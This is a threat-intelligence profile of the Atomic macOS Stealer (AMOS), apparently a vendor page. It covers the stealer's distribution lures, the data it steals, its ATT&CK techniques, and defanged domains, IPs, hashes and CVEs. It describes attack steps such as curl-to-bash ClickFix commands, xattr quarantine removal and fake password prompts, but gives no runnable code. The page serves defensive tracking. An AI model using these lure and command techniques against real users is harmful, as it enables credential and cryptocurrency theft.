Atomic Stealer
Atomic macOS Stealer (AMOS), also called Atomic Stealer and Atomic macOS Stealer, is a macOS-specific information stealer and malware-as-a-service offering documented since 2023. It is sold in criminal channels on a subscription basis, with reporting citing prices from $1,000 to $3,000 per month and operator support features such as victim panels, DMG installers, and ongoing feature updates. AMOS has been distributed through malvertising, compromised websites, fake software installers, poisoned search results, fake ChatGPT/OpenAI download pages, fake Homebrew sites, cracked-app lures, and ClickFix-style social engineering that tricks users into pasting malicious commands into Terminal or executing AppleScript via Script Editor. Reported delivery infrastructure and lures include openew[.]app, homabrews[.]org, slack[.]trialap[.]com, sphereou[.]com, and shared ChatGPT or Claude pages.
AMOS is designed to steal high-value data from macOS systems. Across the reporting, it is described stealing macOS login passwords via fake prompts and local validation with dscl . -authonly, Keychain data, browser credentials, cookies, autofill data, credit card data, browser history, local session tokens, Firefox and Chromium-family browser data, Safari data, Apple Notes, Telegram session data, Discord tokens, iCloud-related data, OpenVPN profiles, system information, and files from Desktop and Documents. It also targets cryptocurrency data extensively, including standalone wallets and wallet directories such as Ledger Live, Trezor Suite, Exodus, Electrum, Sparrow, Atomic, Binance, Coinomi, and numerous browser wallet extensions. Multiple reports state that some AMOS variants search for wallet- and secret-related files such as .wallet, .seed, .key, and .kdbx.
Observed behavior includes execution from DMG-delivered apps or shell/AppleScript loaders, use of long obfuscated AppleScript chains, Base64/Gzip decoding, in-memory execution, quarantine removal with xattr, anti-analysis and virtualization checks via system_profiler or AppleScript, host enumeration, staging stolen data in /tmp directories, compression into ZIP archives such as /tmp/out.zip, and exfiltration over HTTP or HTTPS to hardcoded servers. Reported exfiltration and C2 indicators include amos-malware[.]ru, hxxp://amos-malware[.]ru/sendlog, 5.42.65[.]108, 38.244.158.56/contact, and 45.94.47[.]204 API endpoints. Some reporting also states that AMOS can send stolen logs to Telegram.
Several reports describe post-theft cryptocurrency-focused tampering: AMOS variants download trojanized versions of Ledger Live, Ledger Wallet, and Trezor Suite, attempt to delete legitimate wallet applications, and replace them with attacker-controlled versions, sometimes using sudo after capturing the victim’s password. Persistence has been observed via LaunchAgents or LaunchDaemons and plist files such as /Library/LaunchDaemons/com.finder.helper.plist, with helper files stored in user directories.
AMOS is consistently associated with macOS-focused cybercrime rather than a named state actor. It appears in multi-actor ecosystems and has influenced or been forked into related malware families; the content states Poseidon Stealer was forked from AMOS and later rebranded into Odyssey, and that SHub/Reaper incorporated document-theft functionality similar to AMOS. Known aliases in the provided content include Atomic macOS Stealer, Atomic Stealer, and Shamos/SHAMOS. Reported sample hashes include 15f39e53a2b4fa01f2c39ad29c7fe4c2fef6f24eff6fa46b8e77add58e7ac709, 18bc97e3f68864845c719754d2d667bb03f754f6e87428e33f9c763a8e6a704a, and c0919e1999eaee67e67aeda0287722775afb04e9a9a0f727928b4d11265fb70b.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
"A critical remote code execution (RCE) vulnerability, identified as CVE-2025-55182 and dubbed React2Shell, exists within the React Server Components (RSC) architecture, allowing unauthenticated attackers to execute arbitrary code..."
The campaign coincides with the disclosure of a high-severity OpenClaw vulnerability (CVE-2026-25253) that enables one-click remote code execution through token exfiltration and WebSocket hijacking. Although patched in late January 2026, the flaw points to the platform’s growing attack surface.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Odyssey isn’t original work. It’s a direct rebrand of Poseidon Stealer, which itself was forked from Atomic macOS Stealer (AMOS).
Odyssey isn’t original work. It’s a direct rebrand of Poseidon Stealer, which itself was forked from Atomic macOS Stealer (AMOS).
Two new AMOS (Atomic macOS Stealer) samples uploaded to MalwareBazaar reveal a significant evolution of the macOS stealer family.
Techniques & procedures
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 techniqueLast year, we documented malware distribution campaigns both via malvertising and compromised sites delivering Atomic Stealer (AMOS) onto Mac users... on January 8, we identified a malvertising campaign... The threat actors are luring victims via a Google search ad impersonating Slack
Initial Access
3 techniques...a silent password validation attempt using macOS directory-service commands, and—if that silent check fails—a fake macOS-style prompt reading “Please enter device password to continue,” ... If it matches, the malware captures the user’s login password in cleartext.
Victims are directed to high-fidelity, deceptive web interfaces that simulate legitimate services.
A convincing fake website is impersonating OpenAI’s ChatGPT download page and infecting visitors with malware... The site, openew[.]app, closely mimics OpenAI’s real ChatGPT download experience and offers what appear to be official desktop apps for both Windows and macOS.
Execution
7 techniquesInitial commands leverage curl to fetch obfuscated payloads, which are piped directly into shell interpreters (bash/zsh), minimizing the disk footprint.
ClickFix variant that uses the applescript:// URL scheme to invoke the macOS Script Editor... This URL-encoded hyperlink runs a dual-track routine... while silently executing the curl command in the background to deliver an infostealer, bypassing Gatekeeper via user-coerced interaction.
containing a curl command that downloads and executes malware.
Clicking the Windows download delivers a fake installer... Clicking the macOS button delivers malware... When the victim runs the installer...
Attackers exploit this trust by providing malicious command strings that mimic legitimate installation procedures.
The earliest examples used shared Claude.ai conversations disguised as installation guides... that walked users through opening a terminal and pasting a curl command that downloaded and executed an infostealer.
Persistence
2 techniques...a silent password validation attempt using macOS directory-service commands, and—if that silent check fails—a fake macOS-style prompt reading “Please enter device password to continue,” ... If it matches, the malware captures the user’s login password in cleartext.
Privilege Escalation
2 techniques...a silent password validation attempt using macOS directory-service commands, and—if that silent check fails—a fake macOS-style prompt reading “Please enter device password to continue,” ... If it matches, the malware captures the user’s login password in cleartext.
Stealth
5 techniquesIt looks like Atomic Stealer was updated around mid to late December 2023, where its developers introduced payload encryption in an effort to bypass detection rules... using a new encryption routine that hides strings of interest
Long-term access is secured via LaunchAgents and .plist files, often masquerading as legitimate system or software updaters.
...a silent password validation attempt using macOS directory-service commands, and—if that silent check fails—a fake macOS-style prompt reading “Please enter device password to continue,” ... If it matches, the malware captures the user’s login password in cleartext.
Credential Access
8 techniques...if that silent check fails—a fake macOS-style prompt reading “Please enter device password to continue,” complete with the familiar lock icon. Whatever the user types is validated against the same command. If it matches, the malware captures the user’s login password in cleartext.
Instead of logging keystrokes, the malware displays deceptive dialog boxes requesting the user’s credentials.
Exfiltration efforts focus on high-value data, including ... messaging session tokens (Telegram/Discord)
It copies the macOS keychain, harvests cookies and saved logins from 12 Chromium-based browsers plus Firefox and Waterfox, and extracts Telegram session data.
Exfiltration efforts focus on high-value data, including browser credentials (Chromium/Firefox), macOS Keychains
Exfiltration efforts focus on high-value data, including ... macOS Keychains
Exfiltration efforts focus on high-value data, including browser credentials (Chromium/Firefox)
Subsequent stages often involve a native-looking password prompt to facilitate credential harvesting under the guise of installation continuity.
Discovery
2 techniquesIt also scans 16 cryptocurrency wallet directories, including Ledger Live, Trezor Suite, Exodus, Electrum, and Sparrow. Finally, it searches Desktop and Documents folders for files with extensions like .wallet, .seed, .key, and .kdbx.
Collection
4 techniquesThis will allow Atomic Stealer to collect passwords and other sensitive files that are typically access-restricted... Stealing victim passwords, crypto wallets and cookies
...if that silent check fails—a fake macOS-style prompt reading “Please enter device password to continue,” complete with the familiar lock icon. Whatever the user types is validated against the same command. If it matches, the malware captures the user’s login password in cleartext.
Instead of logging keystrokes, the malware displays deceptive dialog boxes requesting the user’s credentials.
The collected data is compressed into a temporary archive and sent to a hardcoded server.
Command and Control
1 techniqueInitial commands leverage curl to fetch obfuscated payloads
Exfiltration
1 techniqueWhen we analyzed this sample in a sandbox we saw the data exfiltration taking place and the corresponding C2 server
Other
1 techniqueIOCs tracked for this family
279 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
137 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A macOS infostealer delivered via ClickFix social-engineering lures. It is used to steal high-value data such as browser credentials, Keychain data, messaging tokens, notes, and cryptocurrency wallet information.
A macOS infostealer delivered through malicious shared AI chatbot conversations that socially engineer users into pasting terminal commands.
macOS infostealer that steals browser passwords, cookies, Telegram sessions, cryptocurrency wallet data, keychain contents, and sensitive files. It also captures the user’s login password and can replace legitimate Ledger and Trezor wallet applications with trojanized versions.
macOS infostealer that captures login passwords, copies keychain data, harvests browser cookies and saved logins, extracts Telegram sessions, scans cryptocurrency wallet directories, searches for wallet/seed/key files, exfiltrates collected data, and can replace legitimate Ledger and Trezor wallet apps with trojanized versions.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.